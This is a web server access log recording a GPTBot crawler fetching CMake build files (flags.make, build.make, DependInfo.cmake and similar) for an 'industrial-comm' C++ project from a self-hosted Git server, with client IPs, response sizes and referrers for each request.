"/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 64] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:16:28:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 93] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:16:28:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:16:28:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:16:28:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 7690] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:16:28:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:16:28:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 7690] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:16:28:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 10012] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:16:28:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12122] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:28:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10004] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:16:28:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 10004] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:16:28:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 9976] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:16:28:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 9981] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:16:28:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 9978] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:16:28:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10007] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:16:28:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12167] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:28:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10209] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:16:28:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10237] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:16:28:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 14890] [Gzip 9.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:16:28:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9984] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:16:28:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 1035] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:16:28:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12018] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:16:28:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10673] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:16:28:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10644] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:16:28:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11369] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:28:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 11294] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:28:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 10011] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:16:28:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 1035] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:16:28:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12078] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:16:28:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 14920] [Gzip 9.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:16:28:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 11323] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:28:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 11307] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:28:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11368] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:28:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 11306] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:28:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11342] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:28:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10023] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:16:28:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 9982] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:16:28:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10265] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:16:28:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 116] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:16:28:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 64] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:16:28:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10360] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:16:28:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10008] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:16:28:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10270] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:16:28:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10013] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:16:28:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10295] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:16:28:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr 